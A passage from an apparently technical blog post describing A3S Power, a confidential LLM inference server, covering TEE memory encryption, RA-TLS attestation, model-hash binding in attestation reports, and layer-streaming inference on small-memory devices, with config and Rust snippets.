  1. Your Prompt Is Running Naked in Server Memory
&lt;/h2&gt;

&lt;p&gt;First, let's look at what that prompt looks like:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"Client [Name], account ending in 8832, holds 500,000 shares of AAPL at a cost basis of $142.7, with a current unrealized gain of $120M. Please analyze hedging strategies under Fed rate hike expectations and assess the market impact of a large block sale."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;This prompt travels through an HTTPS tunnel to the inference server. TLS terminates. From this moment on, the client's name, account information, position size, and trading strategy — all of it lies in plaintext in server memory.&lt;/p&gt;

&lt;p&gt;A prompt goes through five stages inside an inference server:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Network transit&lt;/strong&gt;: Protected by HTTPS, no problem&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Memory decryption&lt;/strong&gt;: TLS terminates, prompt becomes plaintext — the problem starts here&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Inference computation&lt;/strong&gt;: tokenize → matrix operations → generate response, all in plaintext&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Log recording&lt;/strong&gt;: prompt and response may be written to log files&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Memory residue&lt;/strong&gt;: the request is done, but the data still sits in memory waiting to be overwritten&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Disk encryption protects data at rest. TLS protects data in transit. But who protects &lt;strong&gt;data being processed&lt;/strong&gt;? Nobody.&lt;/p&gt;

&lt;p&gt;This isn't a theoretical risk:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Finance (SOX/GLBA)&lt;/strong&gt; — Leaked trading strategies and client positions mean insider trading or market manipulation. Regulators want auditable technical guarantees, not verbal promises&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Healthcare (HIPAA)&lt;/strong&gt; — Cloud provider administrators can theoretically read all patient data&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Government and Defense&lt;/strong&gt; — Classified information has strict physical isolation requirements; traditional inference servers cannot prove data wasn't leaked&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Multi-tenant AI platforms&lt;/strong&gt; — A single memory boundary vulnerability can break tenant isolation&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The trust model of traditional solutions:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;You trust → Cloud provider → won't read your memory
You trust → Inference server operator → won't log your prompt
You trust → System administrators → won't export memory snapshots
You trust → Everyone with physical access → won't perform cold boot attacks
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Every layer of trust is an assumption. More assumptions means a more fragile system.&lt;/p&gt;

&lt;p&gt;A3S Power's answer: &lt;strong&gt;Replace trust assumptions with cryptographic verification, replace policy promises with hardware enforcement.&lt;/strong&gt; And this protection doesn't require expensive infrastructure — a $10 piece of hardware with 256MB of memory can run it.&lt;/p&gt;

&lt;p&gt;Now let that prompt continue its journey.&lt;/p&gt;




&lt;h2&gt;
  
  
  2. Gate One: A Hardware Attestation Hidden Inside the TLS Handshake
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Problem: There's a Time Gap Between Verification and Communication
&lt;/h3&gt;

&lt;p&gt;Traditional remote attestation schemes split attestation and communication into two steps: first verify the server's identity, then establish a TLS connection to send data. Sounds reasonable?&lt;/p&gt;

&lt;p&gt;It's not. There's a time window between these two steps — a TOCTOU (Time-of-Check-Time-of-Use) vulnerability. You verified server A, but in the instant you establish the connection, an attacker may have already swapped A for B. Your prompt was sent to a server you never verified.&lt;/p&gt;

&lt;h3&gt;
  
  
  How A3S Power Solves It: RA-TLS
&lt;/h3&gt;

&lt;p&gt;RA-TLS (Remote Attestation TLS) embeds the attestation report directly into the X.509 extension fields of the TLS certificate. Remote attestation completes simultaneously with the TLS handshake — no time window, no TOCTOU.&lt;/p&gt;

&lt;p&gt;First, the config — three lines:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;tee_mode&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
&lt;span class="nx"&gt;tls_port&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;11443&lt;/span&gt;
&lt;span class="nx"&gt;ra_tls&lt;/span&gt;   &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;A3S Power's RA-TLS implementation details:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Self-signed ECDSA P-256 certificate&lt;/strong&gt;: A new certificate is generated each time the server starts, valid for 365 days&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Custom X.509 extension&lt;/strong&gt;: OID &lt;code&gt;1.3.6.1.4.1.56560.1.1&lt;/code&gt;, containing a JSON-encoded attestation report&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;SAN (Subject Alternative Names)&lt;/strong&gt;: Always includes localhost + 127.0.0.1 + ::1, with support for additional DNS names or IP addresses&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;When the client for that trading analysis prompt initiates a TLS connection, it can extract the OID &lt;code&gt;1.3.6.1.4.1.56560.1.1&lt;/code&gt; extension from the certificate, parse the JSON attestation report, and verify it with the Verify SDK. The entire process completes during the handshake — verification fails? The connection terminates immediately, and not a single byte of the prompt is sent.&lt;/p&gt;

&lt;h3&gt;
  
  
  There's Also a More Hidden Channel: Vsock
&lt;/h3&gt;

&lt;p&gt;When A3S Power runs inside an a3s-box MicroVM, it doesn't use TCP/IP — it communicates with the host via Vsock (Virtio Socket):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Zero configuration&lt;/strong&gt;: No IP addresses, routing tables, or firewall rules needed&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Secure&lt;/strong&gt;: The communication channel doesn't go through the network stack; network-layer attackers can't intercept it&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;High performance&lt;/strong&gt;: virtio-based shared memory transport with extremely low latency&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;A3S Power uses the same axum router to handle both Vsock and TCP requests — all middleware (rate limiting, authentication, auditing) applies equally to Vsock.&lt;/p&gt;

&lt;p&gt;The TLS handshake is complete. That prompt has now entered the server. Next it will discover that the memory space it's in is completely different from a normal server.&lt;/p&gt;




&lt;h2&gt;
  
  
  3. Gate Two: Hardware Locks Memory in a Safe
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Problem: Software Isolation Isn't Hard Enough
&lt;/h3&gt;

&lt;p&gt;The OS's memory protection is at the software level. A kernel vulnerability, a privilege escalation, a malicious hypervisor — all can bypass it. In cloud environments, your virtual machine runs on someone else's physical machine, and the hypervisor has the right to read all your memory.&lt;/p&gt;

&lt;p&gt;This isn't a question of trust — it's a fundamental architectural flaw.&lt;/p&gt;

&lt;h3&gt;
  
  
  How A3S Power Solves It: TEE Hardware Isolation
&lt;/h3&gt;

&lt;p&gt;TEE (Trusted Execution Environment) creates an encrypted execution environment at the processor level:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Memory encryption&lt;/strong&gt;: All memory data is encrypted by hardware AES keys, managed by the processor's secure processor (PSP/SGX), inaccessible to the OS and VMM&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Integrity protection&lt;/strong&gt;: Hardware prevents external entities from tampering with memory contents inside the TEE&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Remote attestation&lt;/strong&gt;: The TEE can generate hardware-signed attestation reports proving its identity and the integrity of its runtime environment&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Current mainstream TEE technologies:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Technology&lt;/th&gt;
&lt;th&gt;Vendor&lt;/th&gt;
&lt;th&gt;Isolation Granularity&lt;/th&gt;
&lt;th&gt;Memory Encryption&lt;/th&gt;
&lt;th&gt;Attestation Mechanism&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;AMD SEV-SNP&lt;/td&gt;
&lt;td&gt;AMD&lt;/td&gt;
&lt;td&gt;VM-level&lt;/td&gt;
&lt;td&gt;AES-128/256&lt;/td&gt;
&lt;td&gt;SNP_GET_REPORT ioctl&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Intel TDX&lt;/td&gt;
&lt;td&gt;Intel&lt;/td&gt;
&lt;td&gt;VM-level&lt;/td&gt;
&lt;td&gt;AES-128&lt;/td&gt;
&lt;td&gt;TDX_CMD_GET_REPORT0 ioctl&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Intel SGX&lt;/td&gt;
&lt;td&gt;Intel&lt;/td&gt;
&lt;td&gt;Process-level&lt;/td&gt;
&lt;td&gt;AES-128&lt;/td&gt;
&lt;td&gt;EREPORT/EGETKEY&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;A3S Power supports AMD SEV-SNP and Intel TDX, and provides a simulation mode for development and testing.&lt;/p&gt;

&lt;h3&gt;
  
  
  Auto-Detection, Zero Configuration
&lt;/h3&gt;

&lt;p&gt;A3S Power automatically detects the TEE environment at startup — no manual specification needed:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Check for &lt;code&gt;/dev/sev-guest&lt;/code&gt; device file → AMD SEV-SNP&lt;/li&gt;
&lt;li&gt;Check for &lt;code&gt;/dev/tdx-guest&lt;/code&gt; or &lt;code&gt;/dev/tdx_guest&lt;/code&gt; device file → Intel TDX&lt;/li&gt;
&lt;li&gt;Check for &lt;code&gt;A3S_TEE_SIMULATE=1&lt;/code&gt; environment variable → Simulation mode&lt;/li&gt;
&lt;li&gt;None of the above → No TEE&lt;/li&gt;
&lt;/ol&gt;
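&lt;p&gt;The detection order above can be sketched as a small priority check. The device paths and environment variable come from the list; the function and type names are illustrative, not A3S Power's actual code:&lt;/p&gt;

```rust
use std::path::Path;

#[derive(Debug, PartialEq)]
enum TeePlatform { SevSnp, Tdx, Simulated, None }

// Mirrors the detection priority described above: SEV-SNP, then TDX,
// then simulation mode, then no TEE. (A sketch, not the real implementation.)
fn detect(sev: bool, tdx: bool, simulate: bool) -> TeePlatform {
    if sev {
        TeePlatform::SevSnp
    } else if tdx {
        TeePlatform::Tdx
    } else if simulate {
        TeePlatform::Simulated
    } else {
        TeePlatform::None
    }
}

fn main() {
    // In a real guest, the booleans come from the device files and env var:
    let sev = Path::new("/dev/sev-guest").exists();
    let tdx = Path::new("/dev/tdx-guest").exists() || Path::new("/dev/tdx_guest").exists();
    let sim = std::env::var("A3S_TEE_SIMULATE").map(|v| v == "1").unwrap_or(false);
    println!("detected: {:?}", detect(sev, tdx, sim));

    // The priority is fixed: SEV-SNP wins over TDX, TDX over simulation.
    assert_eq!(detect(true, true, true), TeePlatform::SevSnp);
    assert_eq!(detect(false, true, true), TeePlatform::Tdx);
    assert_eq!(detect(false, false, true), TeePlatform::Simulated);
    assert_eq!(detect(false, false, false), TeePlatform::None);
}
```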

&lt;p&gt;The same binary runs in both TEE and non-TEE environments — TEE environments automatically enable hardware protection, development environments use simulation mode for testing.&lt;/p&gt;

&lt;h3&gt;
  
  
  TEE Is Not a Feature, It's a Cross-Cutting Concern
&lt;/h3&gt;

&lt;p&gt;Many people think TEE support just means adding an attestation endpoint. It's not. In A3S Power, TEE security permeates every layer:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Layer           TEE Integration
──────────────  ──────────────────────────────────────────────────────
API             Log redaction, buffer zeroing, token count fuzzing, timing padding,
                attestation endpoint (nonce + model binding)

Server          Encrypted audit logs (AES-256-GCM), constant-time auth,
                RAII decrypted model storage, RA-TLS cert (X.509 attestation ext),
                TEE-specific Prometheus counters

Backend         EPC-aware routing (auto-switch to picolm when model &amp;gt; 75% EPC),
                per-request KV cache isolation, mlock weight pinning

Model           SHA-256 content-addressed storage, GGUF memory estimation (EPC budget planning)

TEE             Attestation (SEV-SNP/TDX ioctl), AES-256-GCM encryption (3 modes),
                Ed25519 model signing, key rotation, policy enforcement, log redaction (10 keys),
                SensitiveString (auto-zeroing), EPC memory detection

Verify          Client: nonce binding, model hash binding, measurement checks (all constant-time),
                hardware signature verification (AMD KDS / Intel PCS certificate chain)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That prompt is now safely resting in hardware-encrypted memory. But a new problem has emerged — how do you know the model processing this prompt is really the one you think it is?&lt;/p&gt;




&lt;h2&gt;
  
  
  4. How Do You Know Which Model the Server Is Running?
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Problem: Model Identity Is a Black Box
&lt;/h3&gt;

&lt;p&gt;You send a request to an endpoint claiming to run "llama-3.2-3b." But how do you verify it? The operator might:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Replace the claimed model with a smaller, cheaper one (to save money)&lt;/li&gt;
&lt;li&gt;Replace the original model with a backdoored one (to steal data)&lt;/li&gt;
&lt;li&gt;Replace the original model with a fine-tuned one (to manipulate output)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;API behavior might look completely normal — you can't reliably distinguish different models from their output.&lt;/p&gt;

&lt;h3&gt;
  
  
  How A3S Power Solves It: Two-Layer Model Integrity + Hardware Attestation Binding
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Layer one: SHA-256 hash verification.&lt;/strong&gt; When &lt;code&gt;tee_mode = true&lt;/code&gt;, each model file's hash is verified at startup. No match? Refuse to start.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;tee_mode&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
&lt;span class="nx"&gt;model_hashes&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="s2"&gt;"llama3.2:3b"&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"sha256:a1b2c3d4e5f6..."&lt;/span&gt;
  &lt;span class="s2"&gt;"qwen2.5:7b"&lt;/span&gt;  &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"sha256:def456789abc..."&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
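&lt;p&gt;The startup check reduces to matching each configured entry against a digest computed from the model file. A minimal sketch of that matching step (the digest computation itself would come from a SHA-256 implementation and is omitted; &lt;code&gt;hash_matches&lt;/code&gt; is a hypothetical name):&lt;/p&gt;

```rust
// Sketch: a configured "sha256:<hex>" entry must match the digest
// computed from the model file at startup. `computed_hex` is assumed
// to be that digest, hex-encoded.
pub fn hash_matches(configured: &str, computed_hex: &str) -> bool {
    match configured.strip_prefix("sha256:") {
        Some(expected) => expected.eq_ignore_ascii_case(computed_hex),
        // Malformed or non-SHA-256 entry: treat as a mismatch,
        // i.e. refuse to start.
        None => false,
    }
}
```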



&lt;p&gt;&lt;strong&gt;Layer two: Ed25519 signature verification.&lt;/strong&gt; The model publisher signs the model file with an Ed25519 private key; the signature is stored at &lt;code&gt;&amp;lt;model_path&amp;gt;.sig&lt;/code&gt; (64-byte raw signature). Verification happens at load time — confirming not only that the model hasn't been tampered with, but also that it genuinely came from the claimed publisher.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;model_signing_key&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"a1b2c3d4..."&lt;/span&gt;  &lt;span class="c1"&gt;# Ed25519 public key (hex-encoded, 32 bytes)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
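&lt;p&gt;The sizes here are fixed by Ed25519 itself: a 32-byte public key (64 hex characters in config) and a 64-byte raw signature file. A sketch of loading and size-checking those inputs; the signature verification itself would be delegated to an Ed25519 implementation, and the helper names are illustrative:&lt;/p&gt;

```rust
// Sketch: decode the hex-encoded config key and enforce Ed25519's
// fixed sizes before handing off to a real verifier.
pub fn decode_hex(s: &str) -> Option<Vec<u8>> {
    if s.len() % 2 != 0 {
        return None;
    }
    (0..s.len())
        .step_by(2)
        .map(|i| u8::from_str_radix(&s[i..i + 2], 16).ok())
        .collect()
}

// Exactly 32 bytes, or the config entry is rejected.
pub fn load_public_key(hex: &str) -> Option<[u8; 32]> {
    decode_hex(hex)?.try_into().ok()
}
```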



&lt;p&gt;But these two layers only solve the server-side problem. How does the client know the server actually did these verifications?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The answer: model attestation binding.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;When the client requests &lt;code&gt;GET /v1/attestation?nonce=&amp;lt;hex&amp;gt;&amp;amp;model=&amp;lt;name&amp;gt;&lt;/code&gt;, A3S Power embeds the model's SHA-256 hash into the &lt;code&gt;report_data&lt;/code&gt; field of the hardware attestation report:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Client sends GET /v1/attestation?nonce=&amp;lt;hex&amp;gt;&amp;amp;model=&amp;lt;name&amp;gt;
    │
    ▼
Build report_data (64 bytes)
    ├── [0..32]  = nonce (client-provided, prevents replay)
    └── [32..64] = SHA-256(model_file) (model hash, proves model identity)
    │
    ▼
Call hardware ioctl
    ├── AMD: SNP_GET_REPORT → /dev/sev-guest
    │   Report offset 0x50: report_data (64 bytes)
    │   Report offset 0x90: measurement (48 bytes, SHA-384)
    │   Report offset 0x1A0: chip_id (64 bytes)
    │
    └── Intel: TDX_CMD_GET_REPORT0 → /dev/tdx-guest
        TDREPORT offset 64: reportdata (64 bytes)
        TDREPORT offset 528: MRTD (48 bytes)
    │
    ▼
Return AttestationReport {
    tee_type: "sev-snp" | "tdx" | "simulated",
    report_data: [u8; 64],      // nonce + model_hash
    measurement: [u8; 48],      // platform boot measurement
    raw_report: Vec&amp;lt;u8&amp;gt;,        // full firmware report (for independent client verification)
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The key is the layout of &lt;code&gt;report_data&lt;/code&gt;: &lt;code&gt;[nonce(32)][model_sha256(32)]&lt;/code&gt;. These 64 bytes are protected by hardware signatures, meaning:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Nonce binding&lt;/strong&gt;: A different nonce each time prevents replay of old attestation reports&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Model binding&lt;/strong&gt;: The model's SHA-256 hash is locked by hardware signature. Swap the model? The attestation immediately becomes invalid&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The client verifies three things to confirm model identity:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;The attestation report is genuinely signed by TEE hardware (via AMD KDS / Intel PCS certificate chain)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;report_data[32..64]&lt;/code&gt; equals the expected model SHA-256 hash&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;report_data[0..32]&lt;/code&gt; equals the nonce the client sent&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Three steps form a complete chain of trust: &lt;strong&gt;hardware attestation → platform integrity → model identity → request freshness&lt;/strong&gt;.&lt;/p&gt;
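&lt;p&gt;The byte layout and the client-side checks can be sketched in a few lines. In the real system these 64 bytes are covered by the hardware signature, and the comparisons are constant-time; plain comparisons are shown here for readability, and the function names are illustrative:&lt;/p&gt;

```rust
// Sketch of the report_data layout: [nonce(32)][model_sha256(32)].
pub fn build_report_data(nonce: &[u8; 32], model_sha256: &[u8; 32]) -> [u8; 64] {
    let mut rd = [0u8; 64];
    rd[..32].copy_from_slice(nonce);        // request freshness
    rd[32..].copy_from_slice(model_sha256); // model identity
    rd
}

// Client side: after validating the hardware signature over the report,
// check that both halves match what the client expects.
pub fn client_accepts(rd: &[u8; 64], sent_nonce: &[u8; 32], expected_hash: &[u8; 32]) -> bool {
    &rd[..32] == sent_nonce && &rd[32..] == expected_hash
}
```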

&lt;p&gt;This is A3S Power's unique innovation — other inference servers don't even have an attestation endpoint, let alone model attestation binding.&lt;/p&gt;

&lt;p&gt;The model identity is confirmed. But inference hasn't started yet. Because there's still a tricky engineering problem — the TEE's memory is too small.&lt;/p&gt;




&lt;h2&gt;
  
  
  5. Running a 10B Model in 256MB — The Secret of picolm Layer-Streaming Inference
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Problem: The Model Doesn't Fit in Cheap Hardware
&lt;/h3&gt;

&lt;p&gt;A harsh reality of privacy inference: TEE environments typically have only 256MB to 512MB of EPC (Enclave Page Cache). More broadly, if you want to run privacy inference on a $10 edge device — say, an embedded board with 256MB of memory — traditional inference engines flatly refuse to run.&lt;/p&gt;

&lt;p&gt;A 10B-parameter Q4_K_M quantized model requires about 6GB of memory. 6GB model, 256MB memory. 24x difference. It won't fit.&lt;/p&gt;

&lt;p&gt;The traditional solution is to use smaller models or more aggressive quantization. But this significantly degrades inference quality — and in security scenarios, model quality directly determines the ceiling of security capabilities (more on why later).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;A3S Power's answer: you don't need expensive hardware, you need a smarter inference approach.&lt;/strong&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  How A3S Power Solves It: picolm Layer-Streaming Inference
&lt;/h3&gt;

&lt;p&gt;The core insight is actually simple: &lt;strong&gt;at any given moment, the forward pass only needs the weights of one layer.&lt;/strong&gt; After processing layer N, layer N's weights are no longer needed — release them, load layer N+1.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Traditional inference (mistralrs / llama.cpp):
┌──────────────────────────────────────────────────┐
│  All 48 layers loaded in memory simultaneously    │
│  Peak memory ≈ model_size (e.g. 10B Q4_K_M ~6GB) │
└──────────────────────────────────────────────────┘

picolm layer-streaming inference:
┌──────────────────────────────────────────────────┐
│  mmap(model.gguf)  ← virtual address space only  │
│                       no physical memory alloc    │
│                                                   │
│  for layer in 0..n_layers:                        │
│    ┌─────────────────────────┐                    │
│    │ blk.{layer}.* tensors   │ ← OS pages in      │
│    │ (~125 MB for 10B Q4_K_M)│   weights on demand│
│    └─────────────────────────┘                    │
│    forward_pass(hidden_state, layer_weights)       │
│    madvise(MADV_DONTNEED) ← release physical pages │
│                                                   │
│  Peak memory ≈ layer_size + KV cache (FP16)       │
│             ≈ 125 MB + 68 MB (10B, 2048 ctx)      │
└──────────────────────────────────────────────────┘
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Two Key Components — Let's Look at the Code
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Component one: &lt;code&gt;gguf_stream.rs&lt;/code&gt; — Zero-copy GGUF parser&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Opens the GGUF file via &lt;code&gt;mmap(MAP_PRIVATE | PROT_READ)&lt;/code&gt;. Parses the header (v2/v3), metadata, and tensor descriptors — but &lt;strong&gt;loads no weight data&lt;/strong&gt;. Each tensor is recorded as an &lt;code&gt;(offset, size)&lt;/code&gt; pair within the mmap region.&lt;/p&gt;

&lt;p&gt;When picolm requests a layer's weights, &lt;code&gt;tensor_bytes(name)&lt;/code&gt; returns a &lt;code&gt;&amp;amp;[u8]&lt;/code&gt; slice pointing directly into the mmap — zero copy, zero allocation. The OS kernel pages in data on demand and automatically reclaims it under memory pressure.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;GGUF file (on disk):
┌────────┬──────────┬──────────────────────────────────┐
│ Header │ Metadata │ Tensor Data (aligned)             │
│ 8 bytes│ variable │ blk.0.attn_q | blk.0.attn_k | ...│
└────────┴──────────┴──────────────────────────────────┘
                          ↑
                    mmap returns &amp;amp;[u8] slice
                    pointing directly here
                    (no memcpy, no allocation)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
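&lt;p&gt;The &lt;code&gt;(offset, size)&lt;/code&gt; lookup itself is a bounds-checked slice into the mapped region. A minimal sketch, with a &lt;code&gt;Vec&amp;lt;u8&amp;gt;&lt;/code&gt; standing in for the mmap and illustrative field names:&lt;/p&gt;

```rust
// Each tensor is recorded as an (offset, size) pair; the returned
// slice borrows the mapped file directly, so no bytes are copied.
pub struct TensorDesc {
    pub offset: usize,
    pub size: usize,
}

pub fn tensor_bytes<'a>(region: &'a [u8], t: &TensorDesc) -> Option<&'a [u8]> {
    // get() bounds-checks, so a corrupt descriptor cannot read past
    // the end of the mapped file.
    region.get(t.offset..t.offset.checked_add(t.size)?)
}
```

&lt;p&gt;Because the slice only borrows the mapping, the OS is free to page the underlying data in on first touch and reclaim it later; the parser never owns a copy of the weights.&lt;/p&gt;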



&lt;p&gt;&lt;strong&gt;Component two: &lt;code&gt;picolm.rs&lt;/code&gt; + &lt;code&gt;picolm_ops/&lt;/code&gt; — Layer-streaming forward pass&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Iterates from &lt;code&gt;blk.0.*&lt;/code&gt; to &lt;code&gt;blk.{n-1}.*&lt;/code&gt;, applying each layer's weights to the hidden state. After processing layer N, &lt;code&gt;madvise(MADV_DONTNEED)&lt;/code&gt; explicitly releases physical pages.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="c1"&gt;// Simplified flow (actual code in src/backend/picolm.rs)&lt;/span&gt;
&lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;gguf&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nn"&gt;GgufFile&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"model.gguf"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;  &lt;span class="c1"&gt;// mmap, only parses header&lt;/span&gt;
&lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;tc&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nn"&gt;TensorCache&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;build&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;gguf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;n_layers&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;  &lt;span class="c1"&gt;// one-time parse of tensor pointers&lt;/span&gt;
&lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;rope_table&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nn"&gt;RopeTable&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;new&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_seq&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;head_dim&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;rope_dim&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;theta&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="k"&gt;mut&lt;/span&gt; &lt;span class="n"&gt;hidden&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nd"&gt;vec!&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mf"&gt;0.0f32&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;n_embd&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
&lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="k"&gt;mut&lt;/span&gt; &lt;span class="n"&gt;buf&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nn"&gt;ForwardBuffers&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;new&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="cm"&gt;/* pre-allocate all working buffers */&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

